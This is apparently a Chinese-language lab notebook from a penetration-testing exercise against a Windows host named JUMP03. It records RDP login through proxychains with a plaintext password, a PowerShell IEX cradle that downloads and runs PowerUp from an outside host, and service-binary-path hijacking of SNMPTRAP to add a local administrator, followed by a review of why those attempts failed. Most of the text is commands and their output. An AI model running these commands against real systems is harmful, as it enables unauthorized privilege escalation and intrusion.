172.16.243.183

rdesktop远程登录：

proxychains4 rdesktop -u nina -p Passw0rd! 172.16.243.183

出现如下错误：

Core(error): tcp_send(), gnutls_record_send() failed with -53: Error in the push function.

Disconnected due to network error, exiting...
disconnect: Unknown reason.

换成：xfreerdp

proxychains4 xfreerdp /u:nina /p:Passw0rd! /v:172.16.243.183

PowerUp查找可能的提权脆弱点：https://michmich.eu/Cheatsheets/internal/03-lpe-windows/

C:\\Users\\nina\\Desktop>powershell -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\\Users\\nina\\Desktop> **IEX((New-Object System.Net.WebClient).DownloadString('<http://192.168.49.243/PowerUp.ps1>'))**
PS C:\\Users\\nina\\Desktop> **Invoke-AllChecks

[*] Checking service permissions...

ServiceName   : SNMPTRAP
Path          : C:\\Windows\\System32\\snmptrap.exe
StartName     : NT AUTHORITY\\LocalService
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True**

PS C:\\Users\\nina\\Desktop> Invoke-ServiceAbuse -Name 'SNMPTRAP'
ServiceDetails.Name : The term 'ServiceDetails.Name' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1795 char:43
+                 Write-Verbose "Service '$(ServiceDetails.Name)' disab ...
+                                           ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (ServiceDetails.Name:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

ServiceAbused Command
------------- -------
**SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add**

C:\\Users\\nina\\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        **START_TYPE         : 4   DISABLED**
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Windows\\System32\\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\\LocalService

C:\\Users\\nina\\Desktop>sc config "SNMPTRAP" binPath="cmd.exe /c net user crack Passw0rd! /add && net localgroup Administrators crack /add"
[SC] ChangeServiceConfig SUCCESS

C:\\Users\\nina\\Desktop>sc stop "SNMPTRAP"
[SC] ControlService FAILED 1062:

The service has not been started.

C:\\Users\\nina\\Desktop>sc start "SNMPTRAP"
[SC] StartService FAILED 1058:

The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

C:\\Users\\nina\\Desktop>

C:\\Users\\nina\\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Windows\\System32\\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\\LocalService

C:\\Users\\nina\\Desktop>sc config "SNMPTRAP" binpath= "cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add"
[SC] ChangeServiceConfig SUCCESS

C:\\Users\\nina\\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        **START_TYPE         : 4   DISABLED**
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\\LocalService

C:\\Users\\nina\\Desktop>**sc config SNMPTRAP start=auto**
[SC] ChangeServiceConfig SUCCESS

C:\\Users\\nina\\Desktop>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        **START_TYPE         : 2   AUTO_START**
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : cmd /c net user crack Passw0rd! /add && net localgroup Administrators crack /add
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\\LocalService

C:\\Users\\nina\\Desktop>sc start SNMPTRAP
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

提权这一块的复盘：

Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Users\\nina>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        **START_TYPE         : 4   DISABLED     //这里需要改成auto，不然PowerUp提权会报错**
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Windows\\System32\\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\\LocalService

看一下，不改的结果：

PS C:\\Users\\nina\\Desktop> **Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'**
*ServiceDetails.Name : The term 'ServiceDetails.Name' is not recognized as the name of a cmdlet, function, script file,
or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and
try again.
At line:1795 char:43
+                 Write-Verbose "Service '$(ServiceDetails.Name)' disab ...
+                                           ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (ServiceDetails.Name:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException*

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add

PS C:\\Users\\nina\\Desktop> net users

User accounts for \\\\JUMP03

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
The command completed successfully.

可以看见 Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'执行报错，并且用户添加失败。

修改START_TYPE为auto：

C:\\Users\\nina>**sc config SNMPTRAP start=auto**
[SC] ChangeServiceConfig SUCCESS

C:\\Users\\nina>sc qc SNMPTRAP
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SNMPTRAP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Windows\\System32\\snmptrap.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SNMP Trap
        DEPENDENCIES       :
        SERVICE_START_NAME : NT AUTHORITY\\LocalService

可以看见 Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'执行不报错，但是用户添加依旧失败。

PS C:\\Users\\nina\\Desktop> **Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'**

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add

PS C:\\Users\\nina\\Desktop> net users

User accounts for \\\\JUMP03

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
WDAGUtilityAccount
The command completed successfully.